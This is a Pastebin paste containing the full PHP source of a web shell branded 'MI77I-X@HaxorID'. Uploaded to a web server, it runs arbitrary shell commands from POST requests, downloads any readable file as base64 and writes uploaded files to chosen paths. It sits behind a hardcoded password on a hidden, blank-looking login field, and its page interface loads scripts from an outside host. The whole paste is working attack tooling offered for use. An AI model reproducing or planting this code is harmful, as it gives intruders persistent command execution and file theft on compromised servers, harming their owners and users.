willysec_id

Terminal Linux

Jan 19th, 2021 (edited)
495
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.54 KB | None | 0 0
  1. <?php
  2.  
  3. function featureShell($cmd, $cwd) {
  4.     $stdout = array();
  5.  
  6.     if (preg_match("/^\s*cd\s*$/", $cmd)) {
  7.         // pass
  8.     } elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) {
  9.         chdir($cwd);
  10.         preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
  11.         chdir($match[1]);
  12.     } elseif (preg_match("/^\s*download\s+[^\s]+\s*(2>&1)?$/", $cmd)) {
  13.         chdir($cwd);
  14.         preg_match("/^\s*download\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
  15.         return featureDownload($match[1]);
  16.     } else {
  17.         chdir($cwd);
  18.         exec($cmd, $stdout);
  19.     }
  20.  
  21.     return array(
  22.         "stdout" => $stdout,
  23.         "cwd" => getcwd()
  24.     );
  25. }
  26.  
  27. function featurePwd() {
  28.     return array("cwd" => getcwd());
  29. }
  30.  
  31. function featureHint($fileName, $cwd, $type) {
  32.     chdir($cwd);
  33.     if ($type == 'cmd') {
  34.         $cmd = "compgen -c $fileName";
  35.     } else {
  36.         $cmd = "compgen -f $fileName";
  37.     }
  38.     $cmd = "/bin/bash -c \"$cmd\"";
  39.     $files = explode("\n", shell_exec($cmd));
  40.     return array(
  41.         'files' => $files,
  42.     );
  43. }
  44.  
  45. function featureDownload($filePath) {
  46.     $file = @file_get_contents($filePath);
  47.     if ($file === FALSE) {
  48.         return array(
  49.             'stdout' => array('File not found / no read permission.'),
  50.             'cwd' => getcwd()
  51.         );
  52.     } else {
  53.         return array(
  54.             'name' => basename($filePath),
  55.             'file' => base64_encode($file)
  56.         );
  57.     }
  58. }
  59.  
  60. function featureUpload($path, $file, $cwd) {
  61.     chdir($cwd);
  62.     $f = @fopen($path, 'wb');
  63.     if ($f === FALSE) {
  64.         return array(
  65.             'stdout' => array('Invalid path / no write permission.'),
  66.             'cwd' => getcwd()
  67.         );
  68.     } else {
  69.         fwrite($f, base64_decode($file));
  70.         fclose($f);
  71.         return array(
  72.             'stdout' => array('Done.'),
  73.             'cwd' => getcwd()
  74.         );
  75.     }
  76. }
  77.  
  78. if (isset($_GET["feature"])) {
  79.  
  80.     $response = NULL;
  81.  
  82.     switch ($_GET["feature"]) {
  83.         case "shell":
  84.             $cmd = $_POST['cmd'];
  85.             if (!preg_match('/2>/', $cmd)) {
  86.                 $cmd .= ' 2>&1';
  87.             }
  88.             $response = featureShell($cmd, $_POST["cwd"]);
  89.             break;
  90.         case "pwd":
  91.             $response = featurePwd();
  92.             break;
  93.         case "hint":
  94.             $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);
  95.             break;
  96.         case 'upload':
  97.             $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);
  98.     }
  99.  
  100.     header("Content-Type: application/json");
  101.     echo json_encode($response);
  102.     die();
  103. }
  104.  
  105. session_start();
  106. $passwd = "HaxorID";
  107.   if($_POST['passwd'] == $passwd) {
  108.     $_SESSION['masuk'] = "masuk";
  109.     header("Location: ?");
  110.   }
  111. if(empty($_SESSION['masuk'])) {
  112. echo "
  113. <center><form method='post'><input type='passwd' type='submit' name='passwd' style='margin:0;background-color:#fff;border:0px solid #fff;'></form>";
  114. exit();
  115. }
  116. ?>
  117. <!DOCTYPE html>
  118. <html>
  119.     <head>
  120.         <meta charset="UTF-8" />
  121.         <title>MI77I-X@HaxorID:~#</title>
  122.         <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  123.         <link rel="stylesheet" href="https://repo.willy.pro/assets/css/mi7terminal.css" />
  124.         <script type="text/javascript" src="https://repo.willy.pro/assets/js/mi7terminal.js"></script>
  125.     </head>
  126.     <body>
  127.         <div id="shell">
  128.             <pre id="shell-content">
  129.                 <div id="shell-logo">
  130.   __  __ _____ ______ ______ _____   __   __  _    _____ _          _ _ <span></span>
  131.  |  \/  |_   _|____  |____  |_   _|  \ \ / / | |  / ____| |        | | |<span></span>
  132.  | \  / | | |     / /    / /  | |_____\ V /  | | | (___ | |__   ___| | |<span></span>
  133.  | |\/| | | |    / /    / /   | |______> <   | |  \___ \| '_ \ / _ \ | |<span></span>
  134.  | |  | |_| |_  / /    / /   _| |_    / . \  | |  ____) | | | |  __/ | |<span></span>
  135.  |_|  |_|_____|/_/    /_/   |_____|  /_/ \_\ | | |_____/|_| |_|\___|_|_|<span></span>
  136.                                              | |                        <span></span>
  137.                                              |_|                        <span></span>
  138.                 </div>
  139.             </pre>
  140.             <div id="shell-input">
  141.                 <label for="shell-cmd" id="shell-prompt" class="shell-prompt">???</label>
  142.                 <div>
  143.                     <input id="shell-cmd" name="cmd" onkeydown="_onShellCmdKeyDown(event)"/>
  144.                 </div>
  145.             </div>
  146.         </div>
  147.     </body>
  148. </html>
  149.  
Add Comment
Please, Sign In to add comment